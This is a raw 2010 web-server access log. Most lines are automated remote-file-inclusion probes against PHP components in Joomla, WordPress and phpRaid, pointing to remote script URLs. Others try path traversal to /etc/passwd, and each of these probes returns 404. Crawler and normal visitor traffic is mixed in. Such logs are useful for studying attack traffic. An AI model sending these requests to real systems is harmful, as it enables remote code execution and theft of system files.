137.101.192.15 - - [20/Apr/2010:08:59:34 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sogra.ru/idxx.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
137.101.192.15 - - [20/Apr/2010:08:59:34 -0500] "GET /logs/access_log.1220054400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sogra.ru/idxx.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
137.101.192.15 - - [20/Apr/2010:08:59:34 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sogra.ru/idxx.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
67.212.162.250 - - [20/Apr/2010:09:01:02 -0500] "GET //admin/config_settings.tpl.php?include_path=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
67.212.162.250 - - [20/Apr/2010:09:01:02 -0500] "GET /logs//admin/config_settings.tpl.php?include_path=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
67.212.162.250 - - [20/Apr/2010:09:01:02 -0500] "GET /logs/access_log.1265414400//admin/config_settings.tpl.php?include_path=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
67.212.162.250 - - [20/Apr/2010:09:01:02 -0500] "GET /logs/access_log.1265673600//admin/config_settings.tpl.php?include_path=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
207.45.186.2 - - [20/Apr/2010:09:02:07 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
207.45.186.2 - - [20/Apr/2010:09:02:56 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
207.45.186.2 - - [20/Apr/2010:09:02:56 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
207.45.186.2 - - [20/Apr/2010:09:02:56 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
204.236.249.179 - - [20/Apr/2010:09:03:11 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
204.236.249.179 - - [20/Apr/2010:09:03:11 -0500] "GET /logs/access_log.1266451200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
208.82.117.81 - - [20/Apr/2010:09:04:14 -0500] "GET /logs/access_log.1221696000///components/com_simpleboard/image_upload.php?sbp=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
208.82.117.81 - - [20/Apr/2010:09:04:14 -0500] "GET ///components/com_simpleboard/image_upload.php?sbp=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
208.82.117.81 - - [20/Apr/2010:09:04:14 -0500] "GET /logs///components/com_simpleboard/image_upload.php?sbp=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
137.101.192.15 - - [20/Apr/2010:09:04:47 -0500] "GET /logs/access_log.1219708800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sogra.ru/idxx.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.212.162.250 - - [20/Apr/2010:09:05:03 -0500] "GET /logs/access_log.1265673600//admin/config_settings.tpl.php?include_path=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
67.212.162.250 - - [20/Apr/2010:09:05:03 -0500] "GET /logs//admin/config_settings.tpl.php?include_path=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
67.212.162.250 - - [20/Apr/2010:09:05:03 -0500] "GET /logs/access_log.1265414400//admin/config_settings.tpl.php?include_path=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
67.212.162.250 - - [20/Apr/2010:09:05:03 -0500] "GET //admin/config_settings.tpl.php?include_path=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
137.101.192.15 - - [20/Apr/2010:09:05:12 -0500] "GET /logs/access_log.1220054400%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sogra.ru/idxx.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
207.45.186.2 - - [20/Apr/2010:09:05:54 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
207.45.186.2 - - [20/Apr/2010:09:05:54 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
207.45.186.2 - - [20/Apr/2010:09:05:54 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
208.82.117.81 - - [20/Apr/2010:09:08:29 -0500] "GET /logs/access_log.1199577600///components/com_simpleboard/image_upload.php?sbp=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:09:08:51 -0500] "GET /logs/access_log.1219190400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:09:14:41 -0500] "GET /logs/access_log.1241049600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [20/Apr/2010:09:15:05 -0500] "GET /artwork/music.htm HTTP/1.0" 200 577 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [20/Apr/2010:09:20:32 -0500] "GET /logs/access_log.1236211200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
62.149.228.44 - - [20/Apr/2010:09:21:53 -0500] "GET //index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
62.149.228.44 - - [20/Apr/2010:09:21:53 -0500] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
62.149.228.44 - - [20/Apr/2010:09:22:01 -0500] "GET /logs/access_log.1270598400%20%20//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
211.233.62.115 - - [20/Apr/2010:09:23:48 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ntels.com/111//kcounter/stats/idomila.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
211.233.62.115 - - [20/Apr/2010:09:23:48 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ntels.com/111//kcounter/stats/idomila.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
87.250.255.243 - - [20/Apr/2010:09:25:26 -0500] "GET /logs/access_log.1206748800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:09:29:19 -0500] "GET /logs/access_log.1222214400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
91.76.98.41 - - [20/Apr/2010:09:31:39 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://hghltd.yandex.net/yandbtm?qtree=WzMYiiuy2q93a1QLNlERXSNtL12aG67B%2BBQmOGZpmnj5BelKItaP3Kb70FXYAM9dMUUTYio6nf1ZaDw7gpp7jmmWl7%2FZlCfyervFOpD5TdBYnvf0sRNOIs1O%2B4YhemBsQPD125epXAYumBZyP%2FcGYEnbt%2FdBWI1MO0WdnQPRB1T%2Fk46Y%2BbOpuRHcvbdYTFZXXXz7%2BM%2FA3lhA1uJIWY%2BrtS6SyIzrk%2BaOnQ%2BPXK6nmEmEDCoPhbc6SgV2pTSI5kv5lO%2FO4sFkmrHECWvON1QuRzToFg3w865sdV9CDpDiYtCeKaRCAP%2BHXo3S3giSRjlct1FRLErRjkdk9%2Fjmh1eS75vkRcCfElhqDJVp3ZorUI5Xo8dAxucU5dn3lApqELfE1E%2FPPN35ZjQTn2VF%2BiB8of70RSsgnTrh1wcIC6YkV%2B%2Fl9S2Ao6Bai9een%2FYUNp4ZnzsIXA6ZRdvHkD26EQxxnCoJElMFqRkruf1km6gW17CMEMEQ73hCEJgDbd8mftfoiKwi94pm7A6WIOpjS0DBucPbehyUTpr8bcnAv0BvBwKj%2F3bs96FiyYReWPJAPUZM%2BmEwansdectvdmNHYenpYU7%2Brx%2BCmYb%2FW9ZI1qyaZM4pu6kEMnPOpCoQzL%2B0DmFheMXhePc3idKXzxO4vOFyvS45bmxoRfBbyNvcTeMUo9VCNPKHEZc0brEf%2F7UR%2Fcxw9HDj21YmMtiaRTgCWNfDnHPDDh9tjsX3awkEAzZVEcAXf5mz54QciJ6X43R8wFKa2U3Kvxq%2FDFwms0NVhB1bzbObstTSOR1SWtZBSeTcuFJiKMqvgKrT7wklgb0Y6RVmr0dpjV9d2xwDjuburlx%2BfbWYBvKFQlqWHVY5Q7fotebylvVEtNAw6iWndfmqCw1qeeCvA1ssMPNdZ%2BFwS6rjTUorrhb%2FxQLnGF3cxUl%2FIWqQX0aP7FViLpGXInI1Qpay8wljOWCpEl1qY%2BJsmQwigG7ytwaJVGo3wRXKLwTJMMv%2Fy4h6gMr5BVPl3Z%2FUXv1rRycNM75MaC7h0yWfZLWqI%2FE5a5CO7sReyzNTQW1D4DhlirnAxs7EhzR%2Fa9Lr6PXFX1PCTW1LsOIbWwQCov2wAgAcn4vlde9JFkYaGpMrX9dxYjrO2xx0%2FXzAAJMAJUA%2F%2BPLyFE38Gvk%3D&text=%E2%EB%E8%FF%ED%E8%E5%20%F0%E5%EB%E8%E3%E8%E8%20%ED%E0%20%F2%F0%E0%E4%E8%F6%E8%EE%ED%ED%FB%E9%20%EA%EE%F1%F2%FE%EC&url=http%3A%2F%2Fdic.academic.ru%2Fdic.nsf%2Fruwiki%2F648968""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 1.1.4322)"
91.76.98.41 - - [20/Apr/2010:09:31:39 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 1.1.4322)"
91.76.98.41 - - [20/Apr/2010:09:31:42 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 1.1.4322)"
91.76.98.41 - - [20/Apr/2010:09:31:45 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 1.1.4322)"
91.76.98.41 - - [20/Apr/2010:09:31:45 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 1.1.4322)"
91.76.98.41 - - [20/Apr/2010:09:31:45 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 1.1.4322)"
91.76.98.41 - - [20/Apr/2010:09:31:46 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 1.1.4322)"
91.76.98.41 - - [20/Apr/2010:09:31:50 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 1.1.4322)"
91.76.98.41 - - [20/Apr/2010:09:31:55 -0500] "GET /costume/thmb9.htm HTTP/1.1" 200 2227 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 1.1.4322)"
91.76.98.41 - - [20/Apr/2010:09:31:56 -0500] "GET /costume/costume97%20copy.JPG HTTP/1.1" 200 15963 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 1.1.4322)"
91.76.98.41 - - [20/Apr/2010:09:31:56 -0500] "GET /costume/costume98%20copy.JPG HTTP/1.1" 200 16840 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 1.1.4322)"
91.76.98.41 - - [20/Apr/2010:09:31:56 -0500] "GET /costume/costume99%20copy.JPG HTTP/1.1" 200 16783 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 1.1.4322)"
91.76.98.41 - - [20/Apr/2010:09:31:56 -0500] "GET /costume/costume101%20copy.JPG HTTP/1.1" 200 16134 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 1.1.4322)"
91.76.98.41 - - [20/Apr/2010:09:31:56 -0500] "GET /costume/costume102%20copy.JPG HTTP/1.1" 200 14869 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 1.1.4322)"
91.76.98.41 - - [20/Apr/2010:09:31:56 -0500] "GET /costume/costume103%20copy.JPG HTTP/1.1" 200 16604 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 1.1.4322)"
91.76.98.41 - - [20/Apr/2010:09:31:56 -0500] "GET /costume/costume104.JPG HTTP/1.1" 200 60508 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 1.1.4322)"
91.76.98.41 - - [20/Apr/2010:09:32:01 -0500] "GET /costume/links.htm HTTP/1.1" 200 1029 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 1.1.4322)"
81.176.226.170 - - [20/Apr/2010:09:33:07 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.176.226.170 - - [20/Apr/2010:09:33:07 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
81.176.226.170 - - [20/Apr/2010:09:33:07 -0500] "GET /logs/access_log.1267920000//index.php?_SERVER[DOCUMENT_ROOT]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
81.176.226.170 - - [20/Apr/2010:09:33:19 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
81.176.226.170 - - [20/Apr/2010:09:33:19 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.176.226.170 - - [20/Apr/2010:09:33:19 -0500] "GET /logs/access_log.1267920000%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
207.46.204.187 - - [20/Apr/2010:09:33:28 -0500] "GET /costume/ HTTP/1.1" 200 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/Apr/2010:09:34:10 -0500] "GET /logs/access_log.1252195200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
124.49.100.254 - - [20/Apr/2010:09:34:36 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
124.49.100.254 - - [20/Apr/2010:09:34:36 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
124.49.100.254 - - [20/Apr/2010:09:34:36 -0500] "GET /logs/access_log.1267920000%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
124.49.100.254 - - [20/Apr/2010:09:34:36 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
124.49.100.254 - - [20/Apr/2010:09:34:36 -0500] "GET /logs/access_log.1267920000%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
124.49.100.254 - - [20/Apr/2010:09:34:36 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
211.236.43.200 - - [20/Apr/2010:09:36:41 -0500] "GET /logs/access_log.1228867200/index.php?option=com_joomfish&Itemid=&mosConfig.absolute.path=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
211.236.43.200 - - [20/Apr/2010:09:36:42 -0500] "GET /index.php?option=com_joomfish&Itemid=&mosConfig.absolute.path=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
211.236.43.200 - - [20/Apr/2010:09:36:42 -0500] "GET /logs/index.php?option=com_joomfish&Itemid=&mosConfig.absolute.path=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.176.226.170 - - [20/Apr/2010:09:39:08 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
81.176.226.170 - - [20/Apr/2010:09:39:08 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.176.226.170 - - [20/Apr/2010:09:39:08 -0500] "GET /logs/access_log.1267920000%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:09:40:00 -0500] "GET /logs/access_log.1258416000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.196 - - [20/Apr/2010:09:40:28 -0500] "GET /logs/access_log.1251849600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
124.49.100.254 - - [20/Apr/2010:09:41:05 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
124.49.100.254 - - [20/Apr/2010:09:41:05 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
124.49.100.254 - - [20/Apr/2010:09:41:05 -0500] "GET /logs/access_log.1267920000%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
124.49.100.254 - - [20/Apr/2010:09:41:14 -0500] "GET /logs/access_log.1267920000%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
124.49.100.254 - - [20/Apr/2010:09:41:14 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
124.49.100.254 - - [20/Apr/2010:09:41:14 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
62.149.228.44 - - [20/Apr/2010:09:44:12 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
62.149.228.44 - - [20/Apr/2010:09:44:12 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
62.149.228.44 - - [20/Apr/2010:09:44:12 -0500] "GET /logs/access_log.1219708800%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
207.45.186.2 - - [20/Apr/2010:09:44:29 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
81.208.34.38 - - [20/Apr/2010:09:44:57 -0500] "GET //phpraid/announcements.php?phpraid_dir=http://snsecrets.com/please/confirm/cunfirm/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
81.208.34.38 - - [20/Apr/2010:09:44:57 -0500] "GET /logs/access_log.1218499200%20%20//phpraid/announcements.php?phpraid_dir=http://snsecrets.com/please/confirm/cunfirm/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
81.208.34.38 - - [20/Apr/2010:09:44:57 -0500] "GET /logs//phpraid/announcements.php?phpraid_dir=http://snsecrets.com/please/confirm/cunfirm/id1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
81.208.34.38 - - [20/Apr/2010:09:45:38 -0500] "GET //phpraid/announcements.php?phpraid_dir=http://snsecrets.com/please/confirm/cunfirm/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
81.208.34.38 - - [20/Apr/2010:09:45:41 -0500] "GET /logs/access_log.1218499200%20%20//phpraid/announcements.php?phpraid_dir=http://snsecrets.com/please/confirm/cunfirm/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
81.208.34.38 - - [20/Apr/2010:09:45:46 -0500] "GET /logs//phpraid/announcements.php?phpraid_dir=http://snsecrets.com/please/confirm/cunfirm/id1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:09:46:47 -0500] "GET /logs/access_log.1231200000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.78.118.123 - - [20/Apr/2010:09:48:37 -0500] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.nationalmedecine.com/forum/autoid.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
121.78.118.123 - - [20/Apr/2010:09:48:37 -0500] "GET /logs/access_log.1238803200%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.nationalmedecine.com/forum/autoid.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
121.78.118.123 - - [20/Apr/2010:09:48:42 -0500] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.nationalmedecine.com/forum/autoid.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
121.78.118.123 - - [20/Apr/2010:09:49:32 -0500] "GET /logs/access_log.1262822400//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.nationalmedecine.com/forum/autoid.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:09:50:40 -0500] "GET /logs/access_log.1232064000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.39 - - [20/Apr/2010:09:52:27 -0500] "GET /logs/access_log.1167004800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.45.186.2 - - [20/Apr/2010:09:52:46 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
207.45.186.2 - - [20/Apr/2010:09:52:46 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
207.45.186.2 - - [20/Apr/2010:09:52:46 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
87.250.255.243 - - [20/Apr/2010:09:53:08 -0500] "GET /logs/access_log.1239494400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:09:54:44 -0500] "GET /logs/access_log.1214092800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:09:54:47 -0500] "GET /logs/access_log.1232668800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
66.221.63.33 - - [20/Apr/2010:09:55:37 -0500] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 325 "-""Mozilla/5.0"
66.221.63.33 - - [20/Apr/2010:09:55:37 -0500] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 320 "-""Mozilla/5.0"
66.221.63.33 - - [20/Apr/2010:09:55:37 -0500] "GET /logs/access_log.1227484800//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 347 "-""Mozilla/5.0"
78.105.175.132 - - [20/Apr/2010:09:55:39 -0500] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://kepsa.com/kpop/lat_bbs_web/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
